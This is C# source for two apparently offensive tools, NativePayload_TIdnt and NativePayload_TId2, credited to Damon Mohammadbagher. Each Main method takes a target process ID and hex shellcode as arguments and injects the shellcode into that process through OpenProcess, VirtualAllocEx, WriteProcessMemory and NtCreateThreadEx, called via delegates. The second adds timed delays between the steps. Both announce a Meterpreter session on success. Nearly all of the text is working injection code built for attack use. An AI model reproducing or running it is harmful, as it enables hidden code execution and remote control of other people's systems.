static void Main(string[] args) { Console.WriteLine(); Console.ForegroundColor = ConsoleColor.DarkGray; Console.WriteLine("NativePayload_TIdnt , Published by Damon Mohammadbagher , May 2020"); Console.ForegroundColor = ConsoleColor.Gray; Console.WriteLine("NativePayload_TIdnt Thread Injection into Target Process + C# Delegation"); Console.WriteLine(); // Console.ReadKey(); string[] X = args[1].Split(','); int Injection_to_PID = (Convert.ToInt32(args[0])); byte[] Xpayload = new byte[X.Length]; for (int i = 0; i < X.Length;) { Xpayload[i] = Convert.ToByte(X[i], 16); i++; } Mydels1and2 delstep1 = new Mydels1and2(DelCLSInvoke._Step1_); Mydels2and3 delstep2 = new Mydels2and3(DelCLSInvoke._Step2_); Mydels3and4 delstep3 = new Mydels3and4(DelCLSInvoke._Step3_); Mydels4and4 delstep4 = new Mydels4and4(DelCLSInvoke._Step4_); Console.WriteLine(); IntPtr H = delstep1.Invoke(Convert.ToInt32(args[0]), args[1]); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write("Step1 Delegate.Invoke("); Console.ForegroundColor = ConsoleColor.Cyan; Console.Write("{0}", H.ToString("X8")); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write(") Intptr Done."); Console.ForegroundColor = ConsoleColor.White; Console.Write(" [API::OpenProcess]"); Console.WriteLine(); IntPtr HA = delstep2.Invoke(H, Xpayload.Length); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write("Step2 Delegate.Invoke("); Console.ForegroundColor = ConsoleColor.Cyan; Console.Write("{0}", HA.ToString("X8")); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write(") Intptr Done."); Console.ForegroundColor = ConsoleColor.White; Console.Write(" [API::VirtualAllocEx]"); Console.WriteLine(); if (delstep3.Invoke(H, HA, Xpayload)) { Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write("Step3 Delegate.Invoke("); Console.ForegroundColor = ConsoleColor.Cyan; Console.Write("{0}0000000", 0.ToString()); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write(") true ;D Done."); Console.ForegroundColor = ConsoleColor.White; Console.Write(" [API::WriteProcessMemory]"); Console.WriteLine(); IntPtr f = delstep4.Invoke(H, HA); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write("Step4 Delegate.Invoke("); Console.ForegroundColor = ConsoleColor.Cyan; Console.Write("{0}", f.ToString("X8")); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write(") Intptr Done."); Console.ForegroundColor = ConsoleColor.White; Console.Write(" [API::NtCreateThreadEx]"); Console.WriteLine(); Console.WriteLine(); Console.ForegroundColor = ConsoleColor.Gray; Console.WriteLine("Bingo Meterpreter Session by Thread Injection Method + Delegations ;)"); Console.WriteLine(); } }
static void Main(string[] args) { Console.WriteLine(); Console.ForegroundColor = ConsoleColor.DarkGray; Console.WriteLine("NativePayload_TId2 , Published by Damon Mohammadbagher , May 2020"); Console.ForegroundColor = ConsoleColor.Gray; Console.WriteLine("NativePayload_TId2 Thread Injection into Target Process + C# Delegate [Step1]"); Console.WriteLine(); bool delay = false; string[] X = null; byte[] Xpayload = null; if (Convert.ToInt32(args[0]) > 0) { delay = true; X = args[2].Split(','); int Injection_to_PID = (Convert.ToInt32(args[1])); Xpayload = new byte[X.Length]; for (int i = 0; i < X.Length;) { Xpayload[i] = Convert.ToByte(X[i], 16); i++; } } else if (args[0].ToUpper() == "0") { delay = false; X = args[2].Split(','); int Injection_to_PID = (Convert.ToInt32(args[1])); Xpayload = new byte[X.Length]; for (int i = 0; i < X.Length;) { Xpayload[i] = Convert.ToByte(X[i], 16); i++; } } Mydels1and2 delstep1 = new Mydels1and2(DelCLSInvoke._Step1_); Mydels2and3 delstep2 = new Mydels2and3(DelCLSInvoke._Step2_); Mydels3and4 delstep3 = new Mydels3and4(DelCLSInvoke._Step3_); // Mydels4and4 delstep4 = new Mydels4and4(DelCLSInvoke._Step4_); if (delay) { Console.ForegroundColor = ConsoleColor.DarkGray; Console.WriteLine("[!] Steps will run by Delay.({0}).", args[0]); } if (delay) { System.Threading.Thread.Sleep(Convert.ToInt32(args[0])); } IntPtr H = delstep1.Invoke(Convert.ToInt32(args[1]), args[2]); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write("Step1 Delegate.Invoke("); Console.ForegroundColor = ConsoleColor.Cyan; Console.Write("{0}", H.ToString("X8")); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write(") Intptr Done."); Console.ForegroundColor = ConsoleColor.White; Console.Write(" [API::OpenProcess]"); Console.WriteLine(); if (delay) { System.Threading.Thread.Sleep(Convert.ToInt32(args[0])); } IntPtr HA = delstep2.Invoke(H, Xpayload.Length); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write("Step2 Delegate.Invoke("); Console.ForegroundColor = ConsoleColor.Cyan; Console.Write("{0}", HA.ToString("X8")); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write(") Intptr Done."); Console.ForegroundColor = ConsoleColor.White; Console.Write(" [API::VirtualAllocEx]"); Console.WriteLine(); if (delay) { System.Threading.Thread.Sleep(Convert.ToInt32(args[0])); } if (delstep3.Invoke(H, HA, Xpayload)) { Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write("Step3 Delegate.Invoke("); Console.ForegroundColor = ConsoleColor.Cyan; Console.Write("{0}0000000", 0.ToString()); Console.ForegroundColor = ConsoleColor.DarkGray; Console.Write(") true ;D Done."); Console.ForegroundColor = ConsoleColor.White; Console.Write(" [API::WriteProcessMemory]"); Console.WriteLine(); } }